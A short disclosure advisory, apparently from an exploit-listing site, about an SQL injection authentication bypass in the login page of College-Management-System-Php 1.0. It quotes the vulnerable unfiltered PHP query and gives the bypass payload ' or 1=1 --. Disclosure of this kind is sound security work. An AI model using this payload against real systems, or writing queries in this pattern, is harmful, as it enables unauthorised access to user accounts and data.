College-Management-System-Php 1.0 SQL Injection

2020.06.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: College-Management-System-Php 1.0 - Authentication Bypass / SQL Injection # Exploit Author: BLAY ABU SAFIAN (Inveteck Global) # Website: https://github.com/olotieno/College-Management-System-Php # Date: 2020-06-16 # Google Dork: N/A # Vendor: https://github.com/olotieno/ # Software Link: https://github.com/olotieno/College-Management-System-Php.git # Affected Version: N/A # Patched Version: unpatched # Category: Web Application # Tested on: MAC The College Management System Php suffers from sql injection vulnerabilities in the index.php page: $msg=""; if(isset($_POST['btn_log'])){ $uname=$_POST['unametxt']; $pwd=$_POST['pwdtxt']; $sql=mysqli_query($con,"SELECT * FROM users_tbl WHERE username='$uname' AND password='$pwd' SQL injection vulnerability:- in file index.php data from POST parameter 'unametxt' and 'pwdtxt' are not getting filter before passing into SQL query and hence rising SQL Injection vulnerability payload: ' or 1=1 -- Thank you regards Abu Safian Blay https://inveteckglobal.com<http://inveteckglobal.com>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top